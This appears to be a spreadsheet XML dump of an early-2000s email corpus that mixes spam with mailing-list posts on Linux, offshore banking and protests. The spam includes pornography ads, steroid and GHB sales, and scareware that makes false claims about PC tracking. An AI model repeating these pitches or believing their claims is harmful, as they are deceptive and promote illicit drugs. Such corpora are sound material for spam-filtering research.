 	&lt;P align=center&gt;&lt;FONT face=Arial size=5&gt;&lt;B&gt;&lt;BR&gt;* Over 150,000 XXX Pictures&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 	&lt;P align=center&gt;&lt;FONT face=Arial size=5&gt;&lt;B&gt;* 125,000+ Sex Videos&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 	&lt;P align=center&gt;&lt;FONT face=Arial size=5&gt;&lt;B&gt;* 100's of LIVE&lt;br&gt;Cams &amp; Shows&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 	&lt;P align=center&gt;&lt;FONT face=Arial size=5&gt;&lt;B&gt;* Erotic Stories &amp; Adult Chat Rooms&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 	&lt;P align=center&gt;&lt;B&gt;&lt;FONT face=Arial size=5&gt;* New Content Added Every
 	Day!&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 	&lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 	&lt;P align=center&gt;&lt;B&gt;&lt;FONT face=Arial size=5&gt;&lt;A
 	href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;FONT
 	color=#000066&gt;Click Here to Enter&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 	&lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 	&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;/DIV&gt;
 &lt;/TD&gt;
 &lt;TD align=center&gt;
 &lt;A href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;IMG src="http://195.235.97.200/personal9/justporno/b4.jpg" width=130 height=150 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;B&gt;&lt;FONT face=Arial color=#ffffff size=1&gt;&amp;lt;&amp;lt; &lt;/FONT&gt;&lt;A style="TEXT-DECORATION: none" href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;FONT face=Verdana color=#00ff00 size=1&gt;click here to see&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Arial color=#ffffff size=1&gt; &amp;gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;P&gt;
 &lt;A href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;IMG src="http://195.235.97.200/personal9/justporno/b5.jpg" width=130 height=150 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;B&gt;&lt;FONT face=Arial color=#ffffff size=1&gt;&amp;lt;&amp;lt; &lt;/FONT&gt;&lt;A style="TEXT-DECORATION: none" href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;FONT face=Verdana color=#00ff00 size=1&gt;click here to see&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Arial color=#ffffff size=1&gt; &amp;gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;P&gt;
 &lt;A href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;IMG src="http://195.235.97.200/personal9/justporno/b6.jpg" width=130 height=150 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;B&gt;&lt;FONT face=Arial color=#ffffff size=1&gt;&amp;lt;&amp;lt; &lt;/FONT&gt;&lt;A style="TEXT-DECORATION: none" href="http://www.terra.es/personal9/justporno/pictures.html"&gt;&lt;FONT face=Verdana color=#00ff00 size=1&gt;click here to see&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=Arial color=#ffffff size=1&gt; &amp;gt;&amp;gt;&lt;/FONT&gt;&lt;/B&gt;&lt;br&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=3 align="center"&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;FONT color=#c0c0c0&gt;-----------------------------------------------------------------------------------------&lt;/FONT&gt;&lt;BR&gt;
 &lt;FONT face=Tahoma color=#c0c0c0 size=2&gt;&lt;B&gt;This newsletter is not unsolicited.&lt;/B&gt; The email address has been subscribed to our mailing list. If you would like to stop receiving this newsletter, just &lt;A href="http://www.tradeddirect.com:81/removal/"&gt;&lt;FONT face=Tahoma color=#0000ff size=2&gt;click here to unsubscribe&lt;/FONT&gt;&lt;/A&gt; and we'll block your email address immediately.&lt;br&gt;&lt;/FONT&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TBODY&gt;
 &lt;/TABLE&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Political mail (the snail kind) doesn't bother me.  I like it a lot of the 
 time, because as crap as it is at least it's not the kind of info you get 
 on TV.  Particularly for small time local politics, it's the best way to 
 get information.
 but what matters is that mail is speech, and political email has to be as
 well protected as any other political speech.  Spam is *the* tool for
 dissident news, since the face that it's unsolicited means that recipients
 can't be blamed for being on a mailing list.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] BNIMANIE !!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=koi8-r"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content="text/html; charset=koi8-r" http-equiv=Content-Type&gt;
 &lt;META content="MSHTML 5.00.2919.6307" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&lt;FONT color=#ff0000 face=Arial size=2&gt;  !!!&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT color=#ff0000 face=Arial size=2&gt;&lt;A 
 href="http://dengi.150m.com/Golden%20Stream.htm"&gt;http://dengi.150m.com/Golden%20Stream.htm&lt;/A&gt;&lt;BR&gt;&lt;A 
 href="http://dengi.150m.com/NEW.htm"&gt;http://dengi.150m.com/NEW.htm&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">bugger, lost the url to that
 site/tarball in question. I have
 it on a cd somewhere though.
 the bblcd toolkit is similar
 but is for building a cd-based
 distro.[1]
 shane
 [1]*this time*
 http://www.bablokb.de/bblcd/
 -----Original Message-----
 From: kevin lyda [mailto:kevin+dated+1029661657.64143c@ie.suberic.net]
 Sent: 13 August 2002 10:08
 To: ilug@linux.ie
 Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)
 On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane wrote:
 &gt; distro.  There's even a tarball[1] with this
 segfault.  core dumped.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</si>
  <si>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This is a multi-part message in MIME format.
 --NS_MAIL_Boundary_07132002
 Content-Type: text/html
 &lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 txt { font-family: Arial, Helvetica, sans-serif; font-size: 8pt}
 orng { font-family: Arial, Helvetica, sans-serif; font-size: 12pt; color:
 #FF3300; font-weight: bold}
 red { font-family: Arial, Helvetica, sans-serif; font-size: 8pt;
 font-weight: bold; color: #006699}
 wh { font-family: Arial, Helvetica, sans-serif; font-size: 10pt;
 font-weight: bold; color: #ffffff}
 gr { font-family: Arial, Helvetica, sans-serif; font-size: 8pt;
 font-weight: bold; color: #666666}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#99CCFF" leftmargin="0" topmargin="10" marginwidth="0"
 marginheight="0"&gt;
 &lt;table width="600" border="0" cellspacing="2" cellpadding="5"
 align="center" bgcolor="#336699"&gt;
   &lt;tr valign="top"&gt; 
     &lt;td bgcolor="#FFFFFF" rowspan="2"&gt; 
       &lt;p class="txt"&gt;&lt;span class="red"&gt;Dear Sir or Madam,&lt;/span&gt;&lt;br&gt;
         &lt;br&gt;
         We are glad to deliver cutting-edge solutions to your IT challenges
 at 
         a quality that is equivalent or superior to that offered by
 domestic companies, 
         but at a fraction of the cost of domestic development.&lt;br&gt;
         &lt;br&gt;
         We represent a number of well-established companies staffed with
 over 
         1000 qualified developers with a record of successfully completing
 hundreds 
         of small and midsize projects and tens of wide-scale projects for
 Fortune 
         100 corporations.&lt;/p&gt;
       &lt;center&gt;
         &lt;span class=red&gt;From business analysis and consulting to web
 design, from 
         coding to testing and porting we provide a full cycle of IT
 services.&lt;br&gt;
         &lt;/span&gt; &lt;br&gt;
       &lt;/center&gt;
       &lt;p class=txt&gt;Working both on-site and offshore our specialists
 develop and 
         integrate&lt;/p&gt;
       &lt;ul class=red&gt;
         &lt;li&gt;Internet/Intranet/Extranet applications&lt;/li&gt;
         &lt;li&gt;Business applications&lt;/li&gt;
         &lt;li&gt;ERP, CRM systems&lt;/li&gt;
         &lt;li&gt; e-Business (B2B, B2C) solutions&lt;/li&gt;
         &lt;li&gt;Mobile and Wireless applications 
         &lt;li&gt;Desktop applications 
         &lt;li&gt;Data Warehouses 
         &lt;li&gt;Security and Cryptography systems 
       &lt;/ul&gt;
       &lt;p align="right"  class=red&gt;and more...&lt;/p&gt;
       &lt;p class=txt&gt;Our quality is based on developed partnerships with
 leading 
         IT technology providers, modern project and quality management and
 exclusive 
         human resources.&lt;/p&gt;
     &lt;/td&gt;
     &lt;td bgcolor="#FFFFFF"&gt; 
       &lt;p align="center"&gt;&lt;br&gt;
         &lt;span class="orng"&gt; Rates only $20 an hour!&lt;/span&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;span class="txt"&gt;&lt;font size="2"&gt;For more info...&lt;b&gt;&lt;a
 href="mailto:Raymond2@btamail.net.cn,Mr6666@libero.it?subject=Please send more
 info!"&gt;CLICK HERE!!!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;BR&gt;
 		&lt;FONT SIZE="-2"&gt;Please include your phone number,&lt;BR&gt;and we will be happy
 to call you!&lt;/FONT&gt;&lt;BR&gt;
       &lt;p align=center&gt;&lt;span class=orng&gt;&lt;font color="#000000"&gt;Or
 Call:&lt;/font&gt; 602-640-0095&lt;br&gt;
         &lt;br&gt;
         Cost effective IT solutions&lt;br&gt;
         Experienced teams of specialists&lt;br&gt;
         Fair rates&lt;/span&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr valign="top"&gt; 
     &lt;td bgcolor="#FFFFFF" valign="top"&gt; 
       &lt;p class="red"&gt;Here is a list of some of the technologies 
         and platforms that our specialists employ to bring you only the
 best, 
         most efficient and cost-effective solution:&lt;br&gt;
       &lt;/p&gt;
       &lt;table width="100%" border="0" cellspacing="1" cellpadding="2"
 class=txt&gt;
         &lt;tr valign="top" bgcolor="#FFFFFF"&gt; 
           &lt;td width="137"&gt; 
             &lt;p&gt;&lt;b&gt; Application Platforms&lt;br&gt;
               &lt;/b&gt; &lt;span class="gr"&gt;.: .Net&lt;br&gt;
               .: Java2EE&lt;br&gt;
               .: IBM WebSphere Suite&lt;br&gt;
               .: Lotus Domino&lt;br&gt;
               .: BEA WebLogic&lt;br&gt;
               .: ColdFusion&lt;br&gt;
               .: Enhydra&lt;/span&gt;&lt;/p&gt;
           &lt;/td&gt;
           &lt;td width="124"&gt; 
             &lt;center&gt;
               &lt;b&gt; Operating Systems&lt;br&gt;
               &lt;/b&gt;
             &lt;/center&gt;
             &lt;span class="gr"&gt;.: all Windows, Mac,&lt;br&gt;
             and Unix platforms&lt;br&gt;
             .: Epoc&lt;br&gt;
             .: Windows CE&lt;br&gt;
             .: Palm OS&lt;br&gt;
             .: Java2Microedition&lt;/span&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top" bgcolor="#FFFFFF"&gt; 
           &lt;td width="137"&gt;&lt;b&gt;Databases&lt;br&gt;
             &lt;/b&gt;&lt;span class="gr"&gt;.: MS SQL&lt;br&gt;
             .: Oracle&lt;br&gt;
             .: DB2&lt;br&gt;
             .: FoxPro&lt;br&gt;
             .: Informix&lt;br&gt;
             .: Sybase&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/td&gt;
           &lt;td width="124"&gt; 
             &lt;p&gt;&lt;b&gt; &lt;b class=txt&gt;Real time embedded systems&lt;br&gt;
               &lt;span class="gr"&gt;.: QNX 4RT&lt;br&gt;
               .: QNX Neutrio RT&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align="center"&gt;&lt;span class=orng&gt;&lt;i&gt;&lt;A
 HREF="mailto:Raymond2@btamail.net.cn,Mr6666@libero.it?subject=I would like a Free quote!"&gt;Free
 quotes!&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;BR&gt;
 	  &lt;FONT SIZE="-2"&gt;Please include your phone number,&lt;BR&gt;and we will be
 happy to call you!&lt;/FONT&gt;&lt;BR&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr valign="middle" align="center"&gt; 
     &lt;td bgcolor="#6699CC" colspan="2"&gt;&lt;span class="txt"&gt;If you received
 this letter 
       by mistake please click &lt;A
 HREF="mailto:Remove-Please@btamail.net.cn?subject=Remove"&gt;Unsubscribe&lt;/a&gt;&lt;/span&gt; 
     &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;
 --NS_MAIL_Boundary_07132002--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [dgc.chat] free?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Sun, 11 Aug 2002 03:33:37 -0400
 To: &lt;dgcchat@lists.goldmoney.com&gt;
 From: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 Subject: Re: [dgc.chat] free?
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;
 Reply-To: &lt;dgcchat@lists.goldmoney.com&gt;
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 3:36 PM +1000 8/11/02, David Hillary wrote:
 &gt; I think that tax havens such as the Cayman Islands should be ranked
 &gt; among the freest in the world. No taxes on business or individuals
 &gt; for a start. Great environment for banking and commerce. Good
 &gt; protection of property rights. Small non-interventionist
 &gt; government.
 Clearly you've never met "Triumph", the Fabulous Crotch-Sniffing
 Caymanian Customs Wonder Dog at extreme close range, or heard the
 story about the expat's college age kid, actually born on Cayman, who
 was literally exiled from the island when the island constabulary
 "discovered" a marijuana seed or three in his summer-break rental car
 a few years back.
 I mean, his old man was some senior cheese at Global Crossing at the
 time, but this was back when they could do no wrong. If that's what
 they did to *his* kid, imagine what some poor former
 junk-bond-hustler might have to deal with someday for, say, the odd
 unauthorized Cuban nightlife excursion. A discretely folded twenty
 keeps the stamp off your passport on the ground in Havana, and a
 bottle of Maker's Mark goes a long way towards some interesting
 nocturnal diversion when you get there and all, but still, you can't
 help thinking that Uncle's going to come a-knockin', and that Cayman
 van's going to stop rockin' some day, and when it does, it ain't
 gonna be pretty.
 Closer to home, conceptually at least, a couple of cryptogeeken were
 hustled off and strip-searched, on the spot, when they landed on
 Grand Cayman for the Financial Cryptography conference there a couple
 of years ago. Like lots of cypherpunks, these guys were active
 shooters in the Bay Area, and they had stopped in Jamaica, Mon, for a
 few days on the way to Grand Cayman. Because they, and their stuff,
 reeked on both counts, they were given complementary colorectal
 examinations and an entertaining game of 20 questions, or two,
 courtesy of the Caymanian Federales, after the obligatory fun and
 games with a then-snarling Crotch-Sniffing Caymanian Wonder Dog.
 Heck, I had to completely unpack *all* my stuff for a nice, well-fed
 Caymanian customs lady just to get *out* of the country when I left.
 Besides, tax havens are being increasingly constrained as to their
 activities these days, because they cost the larger nation-states too
 much in the way of "escaped" "revenue", or at least the perception of
 same in the local "free" press. Obviously, if your money "there"
 isn't exchangeable into your money "here", it kind of defeats the
 purpose of keeping your money "there" in the first place, giving
 folks like FinCEN lots of leverage when financial treaties come up
 for renegotiation due to changes in technology, like on-line
 credit-card and securities clearing, or the odd governmental or
 quango re-org, like they are wont to do increasingly in the EU, and
 the US.
 As a result, the veil of secrecy went in Switzerland quite a while
 ago. The recent holocaust deposit thing was just the bride and groom
 on that particular wedding-cake, and, as goes Switzerland, so goes
 Luxembourg, and of course Lichtenstein, which itself is usually
 accessible only through Switzerland. Finally, of course, the Caymans
 themselves will cough up depositor lists whenever Uncle comes calling
 about one thing or another on an increasingly longer list of fishing
 pretexts.
 At this point, the "legal", state-backed pecuniary privacy pickings
 are kind of thin on the ground. I mean, I'm not sure I'd like to keep
 my money in, say, Vanuatu. Would you? Remember, this is a place where
 a bandana hanging on a string across an otherwise public road will
 close it down until the local erst-cannibal hunter-gatherer turned
 statutorily-permanent landowner figures out just what his new or
 imagined property rights are this afternoon.
 The point is, any cypherpunk worth his salt will tell you that only
 solution to financial or any other, privacy, is to make private
 transactions on the net, cheaper, and more secure, than "transparent"
 transactions currently are in meatspace. Then things get *real*
 interesting, and financial privacy -- and considerably more personal
 freedom -- will just be the icing on the wedding cake. Bride and
 groom action figures sold separately, of course.
 Cheers,
 RAH
 (Who went to FC2K at the Grand Cayman Marriott in February that year.
 Nice place, I liked Anguilla better though, at least at the time, and
 I haven't been back to either since. The beaches are certainly better
 in Anguilla, and the "private" banking system there is probably just
 as porous as Cayman's is, by this point. If I were to pick up and
 move Somewhere Free outside Your Friendly Neighborhood Unipolar
 Superpower, New Zealand is somewhere near the top of my list, and
 Chile would be next, though things change quickly out there in
 ballistic-missile flyover country. In that vein, who knows, maybe
 we're in for some kind of latter-day Peloponnesian irony, and
 *Russia* will end up the freest place on earth someday. Stranger
 things have happened in the last couple of decades, yes?)
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPVYS48PxH8jf3ohaEQKwtgCgw/XSwzauabEP/8jDvUVk/rgFdroAn0xf
 Owk90GoK+X5Pv+bGoKXCwzBK
 =1w9d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subscribe: send blank email to dgcchat-join@lists.goldmoney.com
 unsubscribe: send blank email to dgcchat-leave@lists.goldmoney.com
 digest: send an email to dgcchat-request@lists.goldmoney.com
 with "set yourname@yourdomain.com digest=on" in the message body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</si>
  <si>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Subject: [vox] Anarchist 'Scavenger Hunt' Raises D.C. Police Ire (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Anarchist 'Scavenger Hunt' Raises D.C. Police Ire
 Sat Sep 21, 3:37 PM ET
 WASHINGTON (Reuters) - An online "anarchist scavenger
 hunt" proposed for next week's annual meeting of the
 International Monetary Fund ( news - web sites) and
 World Bank ( news - web sites) here has raised the ire
 of police, who fear demonstrators could damage
 property and wreak havoc.
 Break a McDonald's window, get 300 points. Puncture a
 Washington D.C. police car tire to win 75 points.
 Score 400 points for a pie in the face of a corporate
 executive or World Bank delegate.
 D.C. Assistant Police Chief Terrance Gainer told a
 congressional hearing on Friday that law authorities
 were in talks to decide whether planned protests were,
 "so deleterious to security efforts that we ought to
 take proactive action."
 Several thousand people are expected to demonstrate
 outside the IMF and World Bank headquarters next
 weekend.
 The Anti-Capitalist Convergence, a D.C.-based
 anarchist group, is also planning a day-long traffic
 blockade, banner-drops and protests against major
 corporations in the downtown core.
 Chuck, the 37 year-old webmaster of the anarchist site
 www.infoshop.org who declined to give his last name,
 told Reuters his scavenger hunt was meant as a joke.
 "People were asking for things to do when they come to
 D.C. We made the list to get people thinking, so they
 don't do the boring, standard stuff," he said. "I
 doubt people will actually keep track of what they do
 for points."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get Big, Ripped &amp; Strong!! Deca, D-BOL, Winni-V!1095
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;FONT SIZE=3D"1"&gt;&lt;FONT FACE=3D"VERDANA"&gt;&lt;FONT COLOR=3D"BLACK"&gt;&lt;ALIGN=3DLEF=
 T&gt;
 GET BIG, RIPPED, &amp; STRONG! REAL ANABOLIC PHARMACEUTICALS!*&lt;BR&gt;
 &lt;BR&gt;
 - D-BOL&lt;BR&gt;
 - WINNI-V&lt;BR&gt;
 - EQUIPOSE&lt;BR&gt;
 - GHB&lt;BR&gt;
 - and More!&lt;BR&gt;
 &lt;BR&gt;
 - CLICK HERE TO ENTER =3D=3D=3D=3D=3D&gt;&lt;A HREF=3D"http://www.sdilabs01-02.c=
 om/s-labs/"&gt;SDI-LABS ANABOLICS&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 (Please click on the link below or copy and paste the following url into y=
 our browser if above link does not work.)&lt;BR&gt;
 http://www.sdilabs01-02.com/s-labs/&lt;BR&gt;
 &lt;BR&gt;
 - Build Incredible Muscle Size and Strength&lt;BR&gt;
 - Get Vascular, Hard and Ultra Ripped&lt;BR&gt;
 &lt;BR&gt;
 NEW EXTREMELY POWERFUL PRODUCTS&lt;BR&gt;
 - Liquid Anodrol&lt;BR&gt;
 - Sustenol 250&lt;BR&gt;
 - Deca Nor 50&lt;BR&gt;
 - Masterbolan&lt;BR&gt;
 - Somatroph HGH&lt;BR&gt;
 - CLICK HERE TO ENTER =3D=3D=3D=3D=3D&gt;&lt;A HREF=3D"http://www.sdilabs01-02.c=
 om/s-labs/"&gt;SDI-LABS ANABOLICS&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 SDI-LABS&lt;BR&gt;
 TOLL FREE:1-561-742-5932&lt;BR&gt;
 9835-16 Lake Worth Rd. #227&lt;BR&gt;
 Lake Worth,FL 33467&lt;BR&gt;
 &lt;BR&gt;
 To be cancelled FOR FREE  from our email list please click on the followin=
 g link and and hit  send. Your email address will be removed within 24 hou=
 rs. cancel@tgifcam.com
 If above link does not work please send an email with  the word cancel in =
  the subject  to cancel@tgifcam.com &lt;BR&gt;
 &lt;BR&gt;
 If you have previously cancelled and are still receiving this message, or =
 need to speak with us regarding this email, you may call our ABUSE CONTROL=
  CENTER immediately Toll Free at 1-888-425-6788 or email nomorel@tgifcam.c=
 om , You may also write us at nomore 9835-16 Lake Worth Road #227 -  Lake =
 Worth , FL 33467&lt;BR&gt;
 &lt;BR&gt;
 *Our sincere love and prayers go out to all of the familys and individuals=
  that were touched by the horrible acts committed against our country. And=
  also for our soldiers who are now defending this great land.&lt;BR&gt;&lt;BR&gt;&lt;A--$=
 rotate&gt;
 &lt;/FONT&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HELP WANTED. WORK FROM HOME. FREE INFO
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com/homebiz
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.basetel.com/homebiz
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.basetel.com/homebiz
 To be removed from our link simple go to:
 http://www.basetel.com/remove.html
 8828sLjB6-098naGl15
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello closr ! PERSONAL PRIVACY IS JUST A CLICK AWAY
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear closr ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;YOUR INTERNET USAGE IS BEING TRACKED&lt;br&gt;
 You have no privacy protection.&lt;br&gt;
 Will your BOSS, WIFE or KIDS find out?&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font face="Arial"&gt;
 &lt;a href="http://www185.fastwebsnet.com/"&gt;DOWNLOAD EZ INTERNET PRIVACY SOFTWARE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
 &lt;br&gt;
 +++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 You're in Serious Trouble - It's a Proven Fact!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Deleting &amp;quot;Internet Cache and History&amp;quot; will NOT protect you because any of&lt;br&gt;
 the Web Pages, Pictures, Movies, Videos, Sounds, E-mail, Chat Logs and&lt;br&gt;
 Everything Else you see or do could easily be recovered to Haunt you&lt;br&gt;
 forever! How would you feel if a snoop made this information public to your&lt;br&gt;
 Spouse, Mother &amp;amp; Father, Neighbors, Children, Boss or the Media? It could&lt;br&gt;
 easily Ruin Your Life! Solve all your problems and enjoy all the benefits of&lt;br&gt;
 an &amp;quot;As New PC&amp;quot;, EZ INTERNET PRIVACY SOFTWARE can Speed-Up your PC/Internet Browser,&lt;br&gt;
 reclaim Hard Disk space and Professionally Clean your PC in one easy mouse&lt;br&gt;
 click!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Did you know for example that every click you make on Windows 98 Start Menu&lt;br&gt;
 is logged and stored permanently on a hidden encrypted database within your&lt;br&gt;
 own computer?&lt;br&gt;
 Deleting &amp;quot;internet cache and history&amp;quot;, will not protect you... your PC is&lt;br&gt;
 keeping frightening records of both your online and off-line activity. Any&lt;br&gt;
 of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything&lt;br&gt;
 Else you or anyone else have ever viewed could easily be recovered - even&lt;br&gt;
 many years later!&lt;br&gt;
 How would you feel if somebody snooped this information out of your computer&lt;br&gt;
 and made it public?&lt;br&gt;
 Do your children or their friends use your computers? What have they&lt;br&gt;
 downloaded and tried to delete?&lt;br&gt;
 Act now! And stop these files coming &amp;quot;back from the dead&amp;quot; to haunt you!&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" size="5"&gt;&lt;a href="http://www185.fastwebsnet.com/"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;to be removed &lt;a href="http://www185.fastwebsnet.com/takemeoff.html"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [FRYTE^3247(^(PO1:KJ)_8]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Economist: Internet models, viral spread, social diseases
</t>
  </si>
  <si>
    <t xml:space="preserve">The structure of the Internet has never
 been about where the ditches and ruts
 are dug although the world needs
 ditch diggers too.
 It's a simple inductive concept:
 You are you and see the world as such,
 You plus 1 degree of separation is a new you.
 All this stuff about scale-free Internets, viruses,
 sex, and money is silly.  Scale-free statistically
 indistinguishable models really means Internet-Scale
 as rediscovered by social networks people.
 &gt; Research has shown that the network of human sexual partners 
  &gt; seems to be scale-free, too
 I tend to prefer the Harvard Business Review
 to the Economist as they tend to spend less
 time writing about who's sleeping with whom and
 come up with real statistical models.
 Greg
 Lies, Damn lies, and statistics.
 Russell Turpin wrote:
 &gt; Not exactly new bits, but I enjoyed seeing The Economist
 &gt; pick up on the similarity between computer and social
 &gt; networks:
 &gt; 
 &gt; http://www.economist.com/science/displayStory.cfm?story_id=1365118
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _________________________________________________________________
 &gt; Chat with friends online, try MSN Messenger: http://messenger.msn.com
 &gt; 
 &gt; 
 -- 
 Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
 gbolcer at endeavors.com  | http://endeavors.com
 Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">Niall asked:
 &gt; I have about 60G of data which I need to copy from one disk to another.
 &gt; However, I'm not sure how I should best copy it. The problem is the bulk
 of
 &gt; the data is images and most of these image have two directory entries i.e.
 &gt; there is a hard link to each file. If I copy them using cp -a or my usual
 &gt; favourite of find .|cpio -pmd other_dir it's going to copy each file
 twice,
 &gt; which is not what I want. dump / restore would take care of this if the
 &gt; source filesystem wasn't reiserfs :-( Any suggestions ?
 How about something like:
 cd {dest.dir}
 tar -C {source.dir} cf - | tar xf -
 tar cf - will pipe the tar file to stdout and tar xf - will untar it. This
 should keep permissions and links, and if you do it as root you will keep
 the owners too... :)
 Not tested, though. You may need other flags as well.
 - Matthew
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.comm
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Declan Houlihan (deccy@csn.ul.ie):
 &gt; We're actually investigating switching from Sparc/Solaris to 
 &gt; Intel/Linux. I would much prefer to be using Linux at work
 &gt; so I'm pushing for this. It definately doesn't help when 
 &gt; you're given a bog standard Dell box and linux won't work
 &gt; with the graphics card on it.
